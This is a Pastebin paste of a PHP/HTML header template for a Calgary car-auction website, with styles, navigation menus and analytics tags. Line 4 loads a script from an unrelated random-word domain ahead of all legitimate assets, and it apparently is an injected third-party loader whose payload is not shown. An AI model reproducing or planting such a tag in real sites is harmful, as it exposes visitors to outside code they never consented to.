Advertisement
Moslem1337

Untitled

Nov 27th, 2022
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.52 KB | None | 0 0
  1. <!DOCTYPE html >
  2. <html lang="en">
  3. <head>
  4. <script type='text/javascript' src='//chocolatebushbunny.com/3f/45/65/3f4565683357f75282435734577c74c6.js'></script>
  5. <link rel="manifest" href="manifest.json">
  6. <meta name="theme-color" content="#ffffff"/>
  7.  
  8. <!-- Google Analytics Tracking Code for Dwayne's Regal Auctions V2.0 Analytics -->
  9. <!-- Global site tag (gtag.js) - Google Analytics -->
  10. <script async src="https://www.googletagmanager.com/gtag/js?id=UA-122322378-1"></script>
  11. <script>
  12. window.dataLayer = window.dataLayer || [];
  13. function gtag(){dataLayer.push(arguments);}
  14. gtag('js', new Date());
  15.  
  16. gtag('config', 'UA-122322378-1');
  17. </script>
  18. <!-- End of Google Analytics Tracking Code for Dwayne's Regal Auctions V2.0 Analytics -->
  19.  
  20. <!-- Google Ads Tracking Code for Dwayne's Google Ads Account -->
  21. <!-- Global site tag (gtag.js) - Google Ads: 1041898291 -->
  22. <script async src="https://www.googletagmanager.com/gtag/js?id=AW-1041898291"></script>
  23. <script>
  24. window.dataLayer = window.dataLayer || [];
  25. function gtag(){dataLayer.push(arguments);}
  26. gtag('js', new Date());
  27. gtag('config', 'AW-1041898291');
  28. </script>
  29. <!-- Google Ads Tracking Code for Dwayne's Google Ads Account -->
  30.  
  31.  
  32.  
  33. <meta charset="utf-8" />
  34. <meta name="viewport" content="width=device-width, initial-scale=1">
  35. <link rel="stylesheet" type="text/css" href="/scripts/shadowbox.css" media="screen">
  36. <link rel="stylesheet" type="text/css" href="/css/templateM.css" media="screen">
  37. <link rel="stylesheet" type="text/css" href="/css/template.css" media="screen and (min-width:1000px)">
  38. <link rel="stylesheet" type="text/css" href="/css/menusprite/sprites.css" media="screen and (min-width:1000px)" >
  39. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  40. <link rel="stylesheet" href="//code.jquery.com/ui/1.10.4/themes/smoothness/jquery-ui.css">
  41. <link rel="stylesheet" type="text/css" href="/css/w3css.css">
  42. <link rel="stylesheet" type="text/css" href="/css/regal-20210416.1.css">
  43. <link rel="stylesheet" type="text/css" href="/css/inventory-v3.3.css">
  44.  
  45. <style type="text/css">
  46.  
  47. @media print{
  48. #header{ display:none; }
  49. #content-left{ display:none; }
  50. }
  51. </style>
  52.  
  53. <style type="text/css">
  54. #container { position:relative;top:0px;left:0px;margin:auto;width:100%;background-color:#fff; }
  55. #content{ position:relative; top:0px; left:0px }
  56.  
  57. #content-left{ float:left; width:100% }
  58. #left-top { width:151px; text-align:center; color:#000; display:none; }
  59. #left-bottom { clear:both }
  60.  
  61. #content-with-left{ width:100%;float:left }
  62. #content-without-left{ width:100%;position:relative;top:0px;left:0px;float:left }
  63.  
  64. #menu { display: none; z-index: 10; background-color: #FFF; clear:both }
  65.  
  66. .simple-menu { display:block; }
  67. .simple-menu ul { list-style-type: none; background-color: #EEE; width:80%; margin:auto; text-align:center; padding: 0px; }
  68. .simple-menu ul li { height: 25px;; border: solid 1px #DDD; padding: 5px; }
  69. .simple-menu a { text-decoration: none; }
  70.  
  71. .simple-menu-button { position:absolute; top: 15px; right: 20px; border: 1px solid #DDD; }
  72.  
  73. #footer { margin-top:20px; width:100%; text-align: center; }
  74.  
  75. img.sale-logo { width:90%; }
  76. img.sale-logo:hover { width:90%; }
  77.  
  78. .seller-logo-container{ display: none }
  79.  
  80. .carproof_block img{ width: 100%; }
  81.  
  82. .row::after {
  83. content: "";
  84. clear: both;
  85. display: table;
  86. }
  87.  
  88. .col-1 { width: 8.33%;}
  89. .col-2 { width: 16.66%;}
  90. .col-3 { width: 25%;}
  91. .col-4 { width: 33.33%;}
  92. .col-5 { width: 41.66%;}
  93. .col-6 { width: 50%;}
  94. .col-7 { width: 58.33%;}
  95. .col-8 { width: 66.66%;}
  96. .col-9 { width: 75%;}
  97. .col-10 { width: 83.33%;}
  98. .col-11 { width: 91.66%;}
  99. .col-12 { width: 100%;}
  100.  
  101.  
  102. @media only screen and (max-width: 1000px) {
  103. /* For mobile phones: */
  104. [class*="col-"] {
  105. width: 100%;
  106. }
  107. }
  108.  
  109. @media screen and (min-width:1000px){
  110. #container { position:relative;top:0px;left:0px;margin:auto;width:1000px;background-color:#fff; }
  111. #content{ position:relative; top:0px; left:0px }
  112.  
  113. #content-left{ position:absolute;top:0px;float:none; width: 151px }
  114. #left-top { width:151px; text-align:center; color:#000; display:block; }
  115.  
  116. #content-with-left{ width:800px;position:relative;top:0px;left:210px;float:none }
  117. //#content-without-left{ width:800px;position:relative;top:0px;left:0px;float:none }
  118. #content-without-left{ width:1000px;position:relative;top:0px;left:0px;float:none }
  119.  
  120. #menu { display: block; clear: none }
  121.  
  122. .simple-menu { display:none }
  123. .simple-menu-button { display: none }
  124.  
  125. #footer { margin-top:20px; width:1000px; text-align: center; }
  126.  
  127. img.sale-logo { width:500px; height:105px }
  128. img.sale-logo:hover { width:506px; height:106px; }
  129.  
  130. .seller-logo-container{ display:table-cell }
  131.  
  132. .carproof_block img{ max-width: 96px; }
  133.  
  134. }
  135. </style>
  136. <style>
  137. #left-body ul { padding: 0px; list-style-type: none; border-spacing: 0px 5px; }
  138. #left-body li { spacing:5px;background-color: #000066;border: 1px solid #000066; margin:5px; padding:1px; width:151px; float:left }
  139. #left-body li div{ background-color: #000066; border: 1px solid #000066; }
  140. #left-body li div:hover, #left-body li div.active{background-color: #CC0033; border: 1px solid #FFFFFF; }
  141. #left-body li a{color: #FFFFFF; font-family:Arial, Helvetica, sans-serif; font-weight:bold;text-decoration:none; font-size:13px; }
  142. @media screen and (min-width:760px){
  143. #left-body li {float: none}
  144. }
  145. </style>
  146.  
  147.  
  148. <script>
  149. RegalMobile = {
  150.  
  151. toggleMenu : function( ){
  152. var simpleMenuList = document.getElementsByClassName( "simple-menu-list" );
  153. var simpleMenuImage = document.getElementById( "simple-menu-image" );
  154. var simpleMenu = simpleMenuList[0];
  155.  
  156. if( simpleMenu.style.display == "none" ){
  157. simpleMenu.style.display = "block";
  158. simpleMenuImage.src = "/images/mobile/menu_close.png" ;
  159. }else{
  160. simpleMenu.style.display = "none";
  161. simpleMenuImage.src = "/images/mobile/menu.png" ;
  162. }
  163. }
  164. }
  165. </script>
  166.  
  167. <script src="/js/jquery/jquery-1.10.2.min.js"></script>
  168. <script src="/js/jquery/jquery-ui.min.js"></script>
  169.  
  170. <script type="text/javascript" src="/scripts/shadowbox.js"></script>
  171. <script src="/scripts/ac_runactivecontent.js" type="text/javascript"></script>
  172. <script type="text/javascript" src="/js/main20210416.js" ></script>
  173. <script type="text/javascript" src="/js/regal_20200504.js" ></script>
  174.  
  175. <script type="text/javascript">
  176. Shadowbox.init();
  177.  
  178. $( document ).ready(function(){
  179. //Update time on the page by timezone
  180. timezoneUpdate();
  181.  
  182. // When the user scrolls down 20px from the top of the document, show go to top button
  183. window.onscroll = function() { Regal.scrollFunction() };
  184. });
  185. </script>
  186. <script type="text/javascript" src="/js/inventory_20211012.js" ></script>
  187.  
  188. <?php
  189. $title = isset( $title )? $title : "";
  190. $title = ( isset($cTitle) && trim($cTitle) ) ? $cTitle : $title;
  191. $metadataKeywords = ( isset($cMetadataKeywords) && trim( $cMetadataKeywords ))? $cMetadataKeywords : "calgary auto auctions, alberta car auction, car auction, auto, calgary, vehicles, auction, trucks, alberta, repo, canada, repos, bank repos, cars, rv, regal, car";
  192. $metadataDescription = ( isset($cMetadataDescription) && trim( $cMetadataDescription ))? $cMetadataDescription : "Canada's premiere auto auction and your best bet for buying and selling. Cars, Trucks, RV's, Fleet Vehicles &amp; Alberta's best selection of Bank Repos";
  193. ?>
  194.  
  195. <!--gmkey:a45f89c9-->
  196. <meta name="google-site-verification" content="gH-mi7JN_4XfS93N0zPVtd01-Qc7vxLOdvWzSVBmNV0" />
  197. <meta name="verify-v1" content="z2S0xdSo/XNub7bM4acygTnoo6ofbu4Rg5QoQQncKyY=" />
  198. <title>Regal Auctions: <?=$title?></title>
  199. <meta name="keywords" content="<?=$metadataKeywords?>">
  200. <meta name="description" content="<?=$metadataDescription?>">
  201. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  202. <meta http-equiv="content-language" content="en">
  203.  
  204. <!-- added for selling at Regal update Dec 2018 ---------------- -->
  205.  
  206. <!-- added for selling at Regal update Dec 2018 ---------------- -->
  207.  
  208. </head>
  209. <body style="background-color:#fcfcfc">
  210.  
  211.  
  212.  
  213. <div id="container" >
  214.  
  215. <!-- DIV TOP -->
  216.  
  217. <div id="header" class="w3-hide-small w3-hide-medium">
  218.  
  219.  
  220. <div style="display:block;height:88px">
  221. <div id="logo-crown" ><img src="/images/regalrotate.gif" alt="Regal Crown" width="65" height="38" /></div>
  222. <div id="logo-half" ><img src="/images/regallogo1.jpg" width="118" height="38" alt="Regal Auctions Logo"></div>
  223. <div id="logo-label" >Auctions Online</div>
  224. </div>
  225.  
  226. <div id="menu" >
  227. <div id="main-menu-box" >
  228. <table class="main-menu">
  229. <tr>
  230. <td ><a href="/index.php" target="_top" ><div id="home" class="mainmenu-item" ></div></a></td>
  231. <td ><a href="/index.php?a=onlinebidding#/" target="_top" ><div id="currentsale" class="mainmenu-item"></div></a></td>
  232. <td ><a href="/inventory.php?a=listing&listType=detail&search[seller_type][]=B&sort=lot-asc&unitsPerPage=25&page=1" target="_top"><div id="bankrepos" class="mainmenu-item"></div></a></td>
  233. <td ><a href="/auctioninfo.php?a=fleet" target="_top" ><div id="school" class="mainmenu-item"></div></a></td>
  234. </tr>
  235. <tr>
  236. <td ><a href="/auctioninfo.php" target="_top" ><div id="auctioninfo" class="mainmenu-item"></div></a></td>
  237. <td ><a href="/upcomingauctions.php" target="_top"><div id="upcomingauctions" class="mainmenu-item"></div></a></td>
  238. <td ><a href="/contactus.php" target="_top"><div id="contactus" class="mainmenu-item"></div></a></td>
  239. <td ><a href="https://regalauctions.com/auctioninfo.php?a=selling" target="_top"><div id="links" class="mainmenu-item"></div></a></td>
  240. </tr>
  241. </table>
  242. </div>
  243.  
  244. <div id="current-listings" ><a href="/inventory.php" ><img src="/images/currentlistings.png" width="130" height="80" alt="Current Listings"></a></div>
  245. <div id="liveblock-logo"><a href="/index.php?a=onlinebidding#/"><img src="/images/onlinebiddingbutton.png" width="130" height="80" alt="Online Bidding"></a></div>
  246. <div id="marketreport-logo" ><a href="/marketReport.php"><img src="/images/marketreport.png" width="130" height="80" alt="Market Report"></a></div>
  247. </div>
  248.  
  249. <div id="topline" ><img src="/images/tempimages/topline.png" width="100%" height="15" alt="Menu Line" /></div>
  250.  
  251. </div>
  252.  
  253.  
  254. <div id="small-header" class="w3-hide-large w3-bar w3-red w3-card-4">
  255. <!--
  256. <div class="w3-hide-large w3-bar w3-red w3-top w3-card-4">
  257. -->
  258.  
  259.  
  260. <div class="w3-bar-item w3-text-white w3-large">
  261. <button class="w3-button" aria-label="Open Menu" onclick="w3_open()"><i class="fa fa-bars"></i></button>
  262. </div>
  263.  
  264. <div class="w3-bar-item w3-text-white w3-xlarge">
  265. Regal Auctions
  266. </div>
  267.  
  268. <?php
  269. /*
  270. //any page that includes the header can set $exclude_inventory_search_bar to 1 to not display the search bar
  271. //this is used primarily for the market report page
  272. if( isset($exclude_inventory_search_bar) && $exclude_inventory_search_bar != 1)
  273. {
  274. //echo '
  275. //<div class="w3-bar w3-red" >
  276.  
  277. //<div class="w3-bar-item">
  278. //<span>Search: </span><input id="lotNumber" type="text" >
  279. //<button class="w3-button" type="button" onclick="loadList()">Go</button>
  280. //</div>
  281.  
  282. //</div>
  283. //';
  284. }
  285. */
  286. ?>
  287. </div>
  288.  
  289. <!-- Sidebar for small screen devices -->
  290.  
  291. <div class="w3-sidebar w3-light-grey w3-card-4 w3-animate-left" style="display:none;z-index:1001;" id="mySidebar">
  292. <div class="w3-bar w3-dark-grey">
  293. <span class="w3-bar-item w3-padding-16"><a class="w3-button" href="/index.php">Main Menu</a></span>
  294. <button onclick="w3_close()" class="w3-bar-item w3-button w3-padding-16 w3-right">&times;</button>
  295. </div>
  296. <div class="w3-bar-block w3-medium">
  297. <br>
  298. <a class="w3-bar-item w3-button" href="/index.php?a=onlinebidding#/login" >Online Bidding Login</a>
  299. <br>
  300. <a class="w3-bar-item w3-button" href="/inventory.php" >Vehicle Inventory</a>
  301. <!-- <a class="w3-bar-item w3-button" href="/currentsale.php" >This Week's Auctions</a> -->
  302. <a class="w3-bar-item w3-button" href="/upcomingauctions.php" >Upcoming Auctions</a>
  303. <a class="w3-bar-item w3-button" href="/inventory.php?a=listing&listType=detail&search[seller_type][]=B&sort=lot-asc&unitsPerPage=25&page=1" >Finance Repos</a>
  304. <a class="w3-bar-item w3-button" href="/marketReport.php" >Market Report</a>
  305. <a class="w3-bar-item w3-button" href="/auctioninfo.php?a=selling" >Sell your vehicle</a>
  306. <br>
  307. <button class="w3-button w3-block w3-left-align" onclick="myAccFunc()">Auction Info <i class="fa fa-caret-down w3-text-red"></i></button>
  308. <div id="demoAcc" class="w3-hide w3-whate w3-card">
  309. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=buying" >Buying at Regal Auctions</a>
  310. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=selling" >Selling at Regal Auctions</a>
  311. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=terms" >Terms of Sale</a>
  312. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=auction_types" >Auction Types</a>
  313. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=buyers" >Buyer's Fee</a>
  314. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=buyer_protection" >Buyer Protection Policy</a>
  315. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=hours" >Hours</a>
  316. <a class="w3-bar-item w3-button w3-small" href="/contactus.php?a=location" >Location</a>
  317. <!-- <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=school" >Auction School</a> -->
  318. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=policy_100_day" >100 Day Policy</a>
  319. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=business_assets" >Business Assets</a>
  320. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=fleet" >Fleet Remarketing</a>
  321. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=carfax" >CarFax Reports</a>
  322. <a class="w3-bar-item w3-button w3-small" href="/auctioninfo.php?a=detailing" >Detailing</a>
  323. <a class="w3-bar-item w3-button w3-small" href="/upcomingauctions.php?a=supersale" >Super Sale Dates</a>
  324. <a class="w3-bar-item w3-button w3-small" href="/upcomingauctions.php?a=reposale" >Repo Sale Dates</a>
  325. <a class="w3-bar-item w3-button w3-small" href="/contactus.php" >Who We Are</a>
  326. </div>
  327.  
  328. <!-- <a class="w3-bar-item w3-button" href="/links.php" >Links</a> -->
  329. <a class="w3-bar-item w3-button" href="/contactus.php" >Contact Us</a>
  330. <a class="w3-bar-item w3-button" href="http://regalauctions.ca/pommo/user/subscribe.php" target="_blank">E-Flyer Signup</a>
  331. <!-- <a class="w3-bar-item w3-button" href="/contactus.php?a=careers">Help Wanted</a> -->
  332. <br>
  333. <!-- <a class="w3-bar-item w3-button" href="/lanes.php" target="_blank" ><i class="fa fa-car"></i> Lanes App</a> -->
  334. <br>
  335. <a class="w3-bar-item w3-button" href="/index.php" >Home</a>
  336. </div>
  337. </div>
  338.  
  339. <div class="w3-hide-large w3-margin-bottom">
  340. <!-- <br> -->
  341. <!-- <br> -->
  342. <!-- <br> -->
  343. <!--
  344. <br>
  345. <br>
  346. <br>
  347. <br>
  348. <br>
  349. <br>
  350. -->
  351. </div>
  352.  
  353. <button onclick="Regal.toTop()" id="to-top-button" class="w3-light-gray w3-border" title="Go to top">^</button>
  354.  
  355. <script>
  356. function w3_open() {
  357. document.getElementById("mySidebar").style.display = "block";
  358. }
  359.  
  360. function w3_close() {
  361. document.getElementById("mySidebar").style.display = "none";
  362. }
  363.  
  364. function myAccFunc() {
  365. var x = document.getElementById("demoAcc");
  366. if (x.className.indexOf("w3-show") == -1) {
  367. x.className += " w3-show";
  368. x.previousElementSibling.className += " w3-red";
  369. } else {
  370. x.className = x.className.replace(" w3-show", "");
  371. x.previousElementSibling.className =
  372. x.previousElementSibling.className.replace(" w3-red", "");
  373. }
  374. }
  375. </script>
  376. <!-- END OF TOP -->
  377.  
  378. <div id="account" ></div>
  379.  
  380. <!-- DIV CONTENT -->
  381. <div id="content" >
  382.  
  383. <!-- DIV CONTENT LEFT -->
  384. <div id="content-left" >
  385. <?php
  386. //Display the left menu;
  387. if( isset($leftMenu) ){
  388. $leftMenu->display();
  389. }else{
  390. //loadMyGarageList();
  391. }
  392. ?>
  393. </div>
  394. <!-- END OF CONTENT LEFT -->
  395.  
  396. <!-- DIV CONTENT -->
  397. <?php
  398. $contentId = isset($leftMenu)?'content-with-left':'content-without-left';
  399. ?>
  400. <div id="<?=$contentId?>" >
  401.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement